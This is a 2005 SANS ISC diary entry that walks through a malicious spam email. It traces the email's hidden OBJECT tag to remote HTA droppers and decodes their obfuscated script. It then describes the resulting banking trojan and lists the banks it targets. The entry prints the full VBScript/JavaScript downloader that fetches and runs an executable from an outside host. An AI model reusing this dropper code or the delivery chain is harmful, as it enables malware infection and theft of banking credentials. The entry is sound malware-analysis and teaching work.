SANS/ISC Webcast; MS05-017 Exploit; They're Baaaaaack...; Follow the Bouncing Malware : A Fresh Bounce (Updated: 22:30 GMT)

Published: 2005-05-11. Last Updated: 2005-09-07 13:48:02 UTC
by Tom Liston (Version: 1)
0 comment(s)
Note: Viewing this diary may very well set off your antivirus software. If it does: tough. Nothing in here is Evil (at least in the incarnation that it appears here.) If you write me to tell me that it set off your AV, I?ll quite possibly write back and make fun of you. You?ve been warned.



SANS/ISC Webcast Today




Be there... Aloha.



MS05-017 Exploit


An exploit for MS05-017 (that place-holder "0" in front of the 17 inspires confidence, doesn't it?) is now available as part of the Metasploit Framework, so if you aren't patched... well, why aren't you?



MS05-017 (Vulnerability in Message Queuing Could Allow Code Execution / CAN-2005-0059 / KB892944) was part of Microsoft's April 2005 release and more information can be found here;.
I've not had a chance to test this yet, but H.D. is pretty amazing, so I don't have much question that it works.



They're Baaaaaaaaaaaaaack....



Rumor has it that Microsoft will re-release the MS05-019 security update in June, 2005 correcting their removal of raw sockets...



Follow the Bouncing Malware: A Fresh Bounce



Well, some people have pointed out that it?s been quite some time since I last posted a ?Follow the Bouncing Malware? installment and... well... due to the overwhelming demand (thanks Mom...) here we are.



I thought I would take a look at something more recent - something that might have landed in your inbox sometime over the past couple of weeks, and so I?ve subtitled this journey: A Fresh Bounce.



Disclaimer: None of the links in the following account are ?clickable?. There is a very good reason for that. If I make the links clickable, some yahoo out there will click them. If you insist on playing with these sites you?ll need to at the very least, cut and paste to do it. If you infect your machine, don?t even think of blaming me. If you write me to tell me that you infected yourself, I?ll quite possibly write back and make fun of you. You?ve been warned.



Just the other day, I received the following urgent message via a mailing list address at incidents.org. Poor li?l Sasha was obviously in need of some help:


Delivered-To: xxxxxxxxxxx@gmail.com
From: Sasha NOBLE <xxxxxxxxxxx@roxette.org>
To: xxxxxxx@incidents.org
Subject: Help me
Date: Wed, 04 May 2005 11:15:39 +0000

Hello, Lucas! some help sunburned normal. how ray backbit me violently?
repeatedly position wrought my east except blood. i overrode a boiling
dad beyond science. kindly. their tight spring under office, which sneaked
future, elastic current. Norman felt that stiff list. i drew Marlen who
ridded me Jabari! she dug elastic arm, that interbred foolishly... beyond
interest dowed tin, authority withdrew above the expert toward sad boat:
you misread her ready decision aboard our special expansion, who laid
wearily. a bright balance swam considering our idea; elastic, angry wall.
black drink sock cost, he hoised yearly, deliberately, tenderly. this good
brass came from his offer; rough, possible paper. he wound your future
dress for the private chief, which miscast exactly. she gave him separate.
i outputted clear surprise, which misunderstood obnoxiously... bent the
general play,

Jude MARINO.


Ok... Maybe it was Jude who was in need of help... Or Lucas.... or Norman... or Marlin... or... Jabari...



But I digress...



Suffice to say that someone, somewhere, was in urgent need of my help. And a grammar checker.



How could I possibly ignore their plea?



Well, if I were like most of the rest of you heartless swine, I would simply click the ?delete? button on Outlook. But, to quote the Kink^Hg of Pop in a distant yet eerily prescient incarnation of himself, ?I?m not like the other guys...? and so I started to click the delete button in Thunderbird.



But I couldn?t bring myself to do it.



The dang batteries on my cordless mouse chose that moment to go dead.



Having had far too little sleep, and far too much caffeine, I seized on this as some sort of sign, (I have a tendency to do that... sometime I?ll tell you the story of the Twinkie that, for several months, I believed was the reincarnation of my recently deceased cat...) and decided to swap in some fresh double-A?s and investigate what might be troubling Sasha/Jude/Lucas/Norman/Marlin/Jabari (hereinafter referred to as SJLNMJ).



Disjointed thoughts and poor punctuation were the least of SJLNMJ?s issues. There was Evil lurking in this message: HTML.



Email messages are supposed to be text, thank you. Text. Only text. If God had intended for email to be written in HTML, then the traditional signoff of prayers would be </amen>.



But, I digress...



While the text portion of SJLNMJ?s message reads like James Joyce on crack, perhaps a review of the HTML portion of SJLNMJ?s message would make things clearer:


Content-Type: text/html; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit

<HTML> <BODY> <FONT face="Verdana, Arial"> Hello, Lucas!
<P>
some help sunburned normal. how ray backbit me violently? repeatedly
position wrought my east except blood. i overrode a boiling dad beyond
science. kindly. their tight spring under office, which sneaked future,
elastic current. Norman felt that stiff list. i drew Marlen who ridded
me Jabari! she dug elastic arm, that interbred foolishly... beyond
interest dowed tin, authority withdrew above the expert toward sad boat:
<P>
you misread her ready decision aboard our special expansion, who laid
wearily. a bright balance swam considering our idea; elastic, angry
wall. black drink sock cost, he hoised yearly, deliberately, tenderly.
this good brass came from his offer; rough, possible paper. he wound
your future dress for the private chief, which miscast exactly. she gave
him separate. i outputted clear surprise, which misunderstood
obnoxiously...
<P>
bent the general play,

Jude MARINO. </FONT><P>
<img width=50 height=100 style="display:none"><div
id="abc"></div><ObJecT
data="http://www.oil-bank.ru/cgi-bin/gen/pscounter.cgi?action=click">


Ah! That?s so much clearer. (Okay... I lied. It?s still gibberish.)



Hey! What?s that at the end? An OBJECT tag! Oooo! How fun!



Let?s see where it leads!



(Note: I said ?let?s,? but face it, I really didn?t mean it. Remember: Don?t even think about trying this yourself, boys and girls. You stay here... I?ll go in first...)



(Note #2: I?m talking to you, Mr. ?I Know What I?m Doing.? Don?t try it.)



Grabbing the results of that PHP script with the parameter ?action=click,? gives us the following:


<HTML><HEAD><TITLE>Universal Plugin pre-Installer</TITLE>
<HTA:APPLICATION id=PlugInst
APPLICATIONNAME="Plugin pre-Installer"
SHOWINTASKBAR=NO
CAPTION=YES
SINGLEINSTANCE=YES
MAXIMIZEBUTTON=NO
MINIMIZEBUTTON=NO
WINDOWSTATE=MINIMIZE
/></HEAD>
<OBJECT id="MSplay" classid="clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B">
</OBJECT>
<BODY>
<SCRIPT language="VBScript">
EP=document.location.href
j=InStrRev(EP,"/",-1,1)
EP=Left(EP,j)
If InStr(EP,"cgi-bin")<>0 Then
CGIP=EP & "pscounter.cgi"
Else
CGIP=EP & "cgi-bin/gen/pscounter.cgi"
End If
IP= CGIP & "?action=install"
Set oSA = CreateObject("Shell.Application")
On Error Resume Next
oSA.ShellExecute "mshta",IP
If Err.number <> 0 Then
Cmd="mshta " & IP
MSplay.Run (Cmd),1,FALSE
End If
self.Close
</SCRIPT>
</BODY></HTML>


Now I?ve never claimed to be a JavaScript guru (why would anyone claim such a thing publicly?) but it seems pretty obvious that this little gem is intended to take us right back where we came from but using the parameter ?action=install? this time.



And so, with reckless abandon, complete disregard for personal safety, and a 20 oz Mountain Dew, I returned to the Russian oil bank, lookin? for a little action... uh... equals install:



(Remember... I?m 10? tall and bulletproof. You?re not. Don?t try this at home.)

<HTML><HEAD><TITLE>Universal Plugin pre-Installer</TITLE>
<HTA:APPLICATION id=PlugInst
APPLICATIONNAME="Plugin Installer"
SHOWINTASKBAR=NO
CAPTION=YES
SINGLEINSTANCE=YES
MAXIMIZEBUTTON=NO
MINIMIZEBUTTON=NO
WINDOWSTATE=MINIMIZE/>
</HEAD>
<OBJECT id="MSplay" classid="clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B">
</OBJECT>
<OBJECT id="MSmedia" classid="clsid:0D43FE01-F093-11CF-8940-00A0C9054228">
</OBJECT>
<BODY>
<SCRIPT LANGUAGE="JavaScript">
d="=UFYUBSFB je>Nbjo`IUB?=IUNM?=IFBE?=IUB;BQQMJDBUJPOR#QYQ
8#OBNF>QYQ TIPXJOUBTLCBS>OP
DBQJ#>ZFTD#JOHMFJOTUBODF8#NBYJNJ[FCVUUPOZ#NJO7#XJOEPXTUBUF>C#
0t$0#%CPEZ+#TDSJQU? gvodujpo
Em(Sq-Mo-St-emm*|usz+#tBY>voftdbqf(%52EPEC%3fTusfbn*<wbs pT>ofx
BdujwfYPckfdu(tBY*<

<quite literally, TONS of gibberish deleted>";

l='\0\t\n\r-­ !"#$%&\'()*+,-./0123456789:;<=>?@
ABCDEFGHIJKLMNOPQRSTUVWXYZ[\134]^_`abcdefghijklmnopqrstuvwxyz{|}~';
s='';
for (i=0;i<d.length;i++){b=d.charAt(i);a=l.indexOf(b);if (a==1) a=9;if
(a==2) a=10;if (a==3) a=13;if (a==4) a=34;if (a<=31 &
a>=14){off=s.length-(l.indexOf(d.charAt(++i))-36+90*(l.indexOf(d.charAt(++i))-35))-1;
lp=off+a-14+4;s=s+s.substring(off,lp);}else
if (a>0){ if (a>=41) a=a-1; s=s+l.charAt(a);} else
s=s+b;}document.writeln(s);
</SCRIPT></body></html>


Dang... It looks like a dictionary threw up. (Note: The above is an inexact replica of the actual file that I downloaded. Some of the characters in the original can?t be displayed properly in the diary. Sorry ?bout that.)



And now, dear reader, I?m going to let you in on a little secret. Please understand though that what I?m about to tell you must remain absolutely confidential... it?s super top secret: All of that stuff up there...



...it?s encoded.



Somebody has written some stuff that THEY DON?T WANT US TO SEE.



Shhhh... don?t tell anyone.



Ok. So perhaps that was... well... blatantly obvious.



But what isn?t obvious is how we?re going to deal with this stuff. Get ready boys and girls, ?cause kindly ol? Dr. Tom is gonna take you on a trip down Reverse Engineering Lane and hopefully teach you a thing or three about how to deal with this kind of code obfuscation all on your own.



Now, many years ago, back when I was younger, dumber, and more energetic, I would have banged together some perl code to try to make some sense out of that wad of characters. Time has mellowed me, however, and I?ve come to understand that youthful energy and enthusiasm can nearly always get the daylights kicked out of it by the lazy deviousness that comes with age. ?Why work harder when you can work smarter?? and several other clichés of that ilk come to mind. I?ve come to a place in my life now, where I can cause my adversary to use his own skills against himself, much like Road Runner always does to Wiley Coyote. (I bet you thought I was going to go for some Zen/Kung Fu reference, didn?t you...)



Disregarding the ?data? in the above JavaScript, a quick look at the actual functional portion reveals some interesting things. The code will decode the data and write it into a live HTML document using that ?document.writeln()? call. That ?document? will then execute and, presumably, do something... probably something Bad. But... what if we could co-opt that process and use it to show us the decoded document?



It turns out that it?s not too difficult to accomplish that.



Because JavaScript has far more capabilities when run from your local machine than it ever does when run from a website, we?ll use that difference to our advantage. By inserting a call to an ActiveX component, we can actually open a file on our test machine. We?ll then make a slight alteration to the original script function, and we?ll be able to use the script itself to write out the decoded content.



Whoa... it almost sounds like I know what I?m talking about, doesn?t it?



Before I continue, please note: Never, EVER do this on a production machine. Never do this on a machine that will be used for anything else. Never do this on any machine connected to the network. Never do this on a machine you?re not prepared to format and reinstall. Never, EVER, spit into the wind.



Really.



So... we?re going to stick the following snippet into the JavaScript up near the beginning, right after the <SCRIPT LANGUAGE="JavaScript"> line:

var fso, output; 
fso = new ActiveXObject("Scripting.FileSystemObject");
output = fso.OpenTextFile("C:\\test.txt" , 8, 1, -2);


Then, we?re going to change the ?document.writeln()? function call at the end of the code to be a call to ?output.write()?



Why? Well, that first snippet will create a FileSystemObject which it then uses to open a file called ?test.txt? on the root of our C: drive. The ?handle? to the output file is called, conveniently enough, ?output.? We then change the call from document.writeln() to a call to output.write() and anything that was going to be written into the live HTML document will now go into our output file.



We then fire the newly edited script off in InternetExplorer on a convenient sacrificial box and lo! We find the decoded output in C:\test.txt.



Now someone, somewhere, spent a great deal of time thinking up that whole ?encoding? scheme. Several hours were spent, huddled over a keyboard creating the functions to both encode and decode that gibberish, and we just blew it all away with about two minutes work. As you can see, it didn?t really ?hide? much of anything from us... Perhaps that anonymous programmer?s time would have been better spent taking... say... an ethics class...



Looking for a real job...



Learning to program in a real language...



But I digress...



The output in my ?test.txt? file looked like this:

<TEXTAREA id="Main_HTA">
<HTML><HEAD>
<HTA:APPLICATION id=PXP
APPLICATIONNAME="PXP"
SHOWINTASKBAR=NO
CAPTION=YES
SINGLEINSTANCE=YES
MAXIMIZEBUTTON=NO
MINIMIZEBUTTON=NO
WINDOWSTATE=MINIMIZE
/>
</HEAD>
<BODY>
<SCRIPT>
function Dl(Rp,Ln,Rs,dll)
{
try
{
sAX=unescape("%41DODB%2eStream");
var oS=new ActiveXObject(sAX);
var oX=new ActiveXObject("Microsoft.XMLHTTP");
oX.Open("GET",Rp,0);
oX.Send();
var XB=oX.responseBody;
oS.Type=1;
oS.Mode=3;
oS.Open;
oS.Write(XB);
oS.SaveToFile(Ln,2);
var oA=new ActiveXObject("Shell.Application");
if (dll==0)
{
Cmd=Ln+" "+Rs;
oA.ShellExecute(Cmd);
}
else
{
Cmd=Ln+Rs;
oA.ShellExecute("rundll32",Cmd);
}
}
catch(e){}
}
self.moveTo(5000,5000);
</TEXTAREA>
<IFRAME name="icounter" src="about:blank" width=10 height=10></IFRAME>
<SCRIPT language="VBScript">
ssfDESKTOP = 0
ssfPROGRAMS = 2
ssfSTARTMENU = 11
ssfDESKTOPDIRECTORY = 16
ssfFONTS=20
ssfCOMMONSTARTMENU = 22
ssfCOMMONPROGRAMS = 23
ssfCOMMONSTARTUP = 24
ssfCOMMONDESKTOPDIR = 25
ssfCOMMONALTSTARTUP = 30
ssfCOMMONFAVORITES = 31
ssfCOMMONAPPDATA = 35
ssfWINDOWS = 36
ssfSYSTEM = 37
Dim oXMLHTTP
Dim oShellApp
Dim oFolder
Dim oFolderItem
Dim PluginFile
Dim WinDir
Dim EnvStrings
Dim Font_Path_Components
Dim XMLBody
Dim cByte
Dim ByteCode
Dim Main_HTA_Body
Dim Cmd_Params
Dim Module_Path
Dim Trojan_Path
Dim IntervalID
Dim nCmdCalled
nCmdCalled=0
WinEnv_Mask="windir="
Exploit_Path=document.location.href
j=InStrRev(Exploit_Path,"/",-1,1)
Exploit_Path=Left(Exploit_Path,j)
If InStr(Exploit_Path,"cgi-bin")<>0 Then
CGI_Script_Path=Exploit_Path & "pscounter.cgi"
Else
CGI_Script_Path=Exploit_Path & "cgi-bin/gen/pscounter.cgi"
End If
document.frames(0).location.href = CGI_Script_Path & "?action=finish"
InitPaths()
Randomize
self.MoveTo 6000,6000
ExeName=GenerateName()
ExeName=ExeName & ".exe"
DllName=GenerateName()
DllName=DllName & ".dll"
HTAName=GenerateName()
HTAName=HTAName & ".hta"
Set oShellApp = CreateObject("Shell.Application")
Set oFolder = oShellApp.NameSpace(ssfFONTS)
Set oFolderItem=oFolder.ParseName("Symbol.ttf")
TestName=oFolderItem.Path
xTestName=Replace(TestName,"Symbol","Symbolw",1,-1,vbTextCompare)
Font_Path_Components=Split(oFolderItem.Path,"\",-1,1)
WinDir= Font_Path_Components(0) & "\" & Font_Path_Components(1) & "\"
ExeName=WinDir & ExeName
DllName=WinDir & DllName
HTAName=WinDir & HTAName
On Error Resume Next
Set oFolderItem = oFolder.ParseName("Symbolw.ttf")
If Err.number <> 0 Then
Call Run_Installer
Else
LinkPath=oFolderItem.Path
If LinkPath="" Then
Call Run_Installer
Else
self.Close
End If
End If
setTimeout "HangUp()",9000
Sub Run_Installer
Main_HTA_Body=document.all.Main_HTA.innerText
Download_Call="Dl('" & Trojan_Path & "'" & "," & "'" & ExeName & "'" &
"," & "'',0);"
Download_Call=Replace(Download_Call,"\","\\")
Main_HTA_Body= Main_HTA_Body & Download_Call
Main_HTA_Body= Main_HTA_Body & "self.close();</SCR" & "IPT></BODY>"
Main_HTA_Body=Replace(Main_HTA_Body,vbCrLf,"")
' Prepare the string that will be passed to cmd.exe
Main_HTA_Body=Replace(Main_HTA_Body,">","^>")
Main_HTA_Body=Replace(Main_HTA_Body,"<","^<")
WinOS=Get_Win_Version
Select Case WinOS
Case "NT"
Call Download_and_Execute(Trojan_Path,ExeName,"",0)
Cmd_Params="cmd /c copy " & TestName & " " & xTestName
MSplay.Run (Cmd_Params),1,FALSE
Case "2K"
' Create an additional HTA file (can't be greater than 1000 bytes)
Cmd_Params="/c echo " & Main_HTA_Body & " > " & HTAName
oShellApp.ShellExecute "cmd",Cmd_Params,"open"
oShellApp.ShellExecute "mshta",HTAName
Cmd_Params="/c copy " & TestName & " " & xTestName
oShellApp.ShellExecute "cmd", Cmd_Params
Cmd_Params="/c del " & HTAName
IntervalID=setInterval("Delete_HTA(Cmd_Params)",3000)
Case "XP"
' Create an additional HTA file (can't be greater than 1000 bytes)
Cmd_Params="/c echo " & Main_HTA_Body & " > " & HTAName
oShellApp.ShellExecute "cmd",Cmd_Params,"open"
oShellApp.ShellExecute "mshta",HTAName
Cmd_Params="/c copy " & TestName & " " & xTestName
oShellApp.ShellExecute "cmd", Cmd_Params
Cmd_Params="/c del " & HTAName
IntervalID=setInterval("Delete_HTA(Cmd_Params)",3000)
Case Else
Call Download_and_Execute(Trojan_Path,ExeName,"",0)
Cmd_Params="command /c copy " & TestName & " " & xTestName
MSplay.Run (Cmd_Params),1,FALSE
End Select
End Sub

Sub Download_and_Execute(Remote_path,Local_name,Run_params,Run_by_Rundll32)

set oXMLHTTP = CreateObject("Microsoft.XMLHTTP")
Module_Path=Remote_path
OpenSession()
GetStatus=GetFile()
If GetStatus=0 Then
Plugin_size=LenB(XMLBody)
Set PluginFile=MSmedia.CreateTextFile(Local_name, TRUE)
For j=1 To Plugin_size
cByte=MidB(XMLBody,j,1)
ByteCode=AscB(cByte)
WriteFile()
Next
PluginFile.Close
If Run_by_Rundll32 = 0 Then
Cmd=Local_name & " " & Run_params
Else
Cmd="rundll32" & " " & Local_name & Run_params
End If
On Error Resume Next
MSplay.Run (Cmd),1,FALSE
End If
set oXMLHTTP=Nothing
End Sub

Function HangUp()
clearInterval(IntervalID)
self.Close
End Function

Function Delete_HTA(params)
If nCmdCalled<4 Then
oShellApp.ShellExecute "cmd",params
nCmdCalled=nCmdCalled+1
End If
End Function

Function Get_Win_Version()
IEversion=navigator.appVersion
If InStr(IEversion,"Windows 95") <> 0 Then
Get_Win_Version="95"
ElseIf InStr(IEversion,"Windows NT 4") <> 0 Then
Get_Win_Version="NT"
ElseIf InStr(IEversion,"Win 9x 4.9") <> 0 Then
Get_Win_Version="ME"
ElseIf InStr(IEversion,"Windows 98") <> 0 Then
Get_Win_Version="98"
ElseIf InStr(IEversion,"Windows NT 5.0") <> 0 Then
Get_Win_Version="2K"
ElseIf InStr(IEversion,"Windows NT 5.1") <> 0 Then
Get_Win_Version="XP"
Else
Get_Win_Version="Unknown"
End If
End Function

Function WriteFile
PluginFile.Write(Chr(ByteCode))
End Function

Function GetFile
oXMLHTTP.Send()
On Error Resume Next
XMLBody=oXMLHTTP.responseBody
If Err.number <> 0 Then
GetFile=-1
Else
GetFile=0
End If
End Function

Function OpenSession
Req_type="G" & "E" & "T"
HTTPSession=oXMLHTTP.Open(Req_Type,Module_Path,0)
End Function

Function GenerateName()
RandomName=""
rr=Int(8*Rnd)
ik=0
Do
ii=Int(25*Rnd)+97
RandomName=RandomName+Chr(ii)
ik=ik+1
Loop While ik<rr
GenerateName=RandomName
End Function

Function InitPaths
Trojan_Path="http://www.subtilius.com/divx.exe"
End Function

</SCRIPT>
</BODY></HTML>


Well now. Ain?t that purty? I really do appreciate the way that they?re not even attempting to rationalize what they?re doing... with variable names like ?Trojan_Path,? staring you in the face, it?s sorta? hard to keep up the charade that you?re writing an app for ?market research.?



Speaking of ?Trojan_Path? let?s see what we find at the other end...



The file divx.exe is a Win32 executable, 21,536 bytes long. Taking a quick look at the file reveals that it has been packed with FSG and has a really mangled PE header and a tiny, really whacked MZ header. Once again, someone is trying to hide something...



Packed / obfuscated executables are nothing more than an annoyance. They don?t stand up to a determined effort to unpack them because, like the ?encoding? we just blew away, packed executables always carry the keys to the kingdom along with them. Generally with a little coaxing, they give up their secrets. FSG is no exception, and with a bit of effort, I was able to unpack the divx.exe executable. When I did, I found all sorts of interesting stuff...



When executed, divx.exe copies itself to the windows\system32 folder under the name winldra.exe installs a key to launch itself in HKLM\Software\Microsoft\Windows\CurrentVersion\Run and dumps several DLL files in the system32 folder. These DLL files are used by the executable to latch itself into the Windows CBTProc hook, a rather dubious ?feature? of the operating system that was intended to be used by Computer Based Training programs to monitor what?s going on in the active window. According to Microsoft, ?The system calls this function before activating, creating, destroying, minimizing, maximizing, moving, or sizing a window; before completing a system command; before removing a mouse or keyboard event from the system message queue; before setting the keyboard focus; or before synchronizing with the system message queue. A computer-based training (CBT) application uses this hook procedure to receive useful notifications from the system.?



?Useful notifications?...



Yep.



Pretty darned useful, if you?re a virus.



With that viewpoint, the program watches for access to several banking sites:

cbonline.co.uk
new.egg.com
anbusiness.com
my.if.com
co-operativebank.co.uk
abbeynational.co.uk
smile.co.uk
commerzbank.com
cbksec.com
westlb.de
westlbmarkets.net
adig.de
ebase.com
dresdner-privat.de
teledata.de
diba.de
schwaebisch-hall.de
bayernlb.de
bfg.de
seb.de
cashbox.de
1822direkt.com
internet-filiale.net
comdirect.de
diraba.de
dab-bank.com
dit.de
fraspa1822.de
haspa.de
gad.de
gallinat.de
helaba-trust.de
heller-bank.de
ikb.de
lbb.de
lrp.de
lbbw-direkt.de
lbbw.de
leonberger.de
wuestenrot.de
nordlb.de
olb.de
rwg.de
rbgarrel.de
rb-graefo.de
paffrather.de
rb-pfaffenhofen-roth.de
raiba-nu-wh.de
santander.de
sparda-hh.de
sparda.de
spk-marne.de
izb.de
lzo.com
naspa.de
osgv.de
neumarkt-direkt.de
sskduesseldorf.de
sskm.de
suedwestlb.de
ammerland.de
borkenervb.de
vilstal.net
hsbc.co.uk
sparkasse
skodabank.de
volkswagenbank.de
bmwbank.de


There are also some shenanigans done with several citibank.de hosts, but I?m not entirely sure how that works...



Ever helpful, the program then corrects any math errors the user may make while using the site.



(Just checking to see if you were still paying attention...)



It actually captures text within any browser session associated with one of those sites saving it in a file and sending it off via email. Then, in a fit of pique and poor grammar, it commemorates the occasion with a registry entry:



HKCU\Software\SARS\mailsended = 1



Really nice, eh?



It also takes the, now passé, step of diddling with the user?s hosts file and routing a large list of antivirus vendor sites to the loopback address.



FYI: When I first started playing with this chunk o' malware I sent it off to all of the major AV vendors and it should currently be identified by their signature files. Attempts were made to get the offending sites shut down as well.



So after all of that, I suddenly find myself re-thinking the whole ?good Samaritan? thing where ol? SJLNMJ is concerned. Yes, SJLNMJ needed help alright... he/she/they/it needed help to the funds in my online bank account (of which I have none...)



I?ve learned my lesson - helping others is bad. The crooks and thieves of this world rely on and use our better natures against us. You won?t catch me making THAT mistake again...



Hey! Lookie here! There?s this dude in Nigeria that has to find a way to get $50,000,000 US out of the country... all he needs is a little help.



---------------------------------------------------------------------

Handler on Duty

Tom Liston - Intelguardians Network Intelligence, LLC - tom at intelguardians dot com
Keywords:
0 comment(s)

Comments


Diary Archives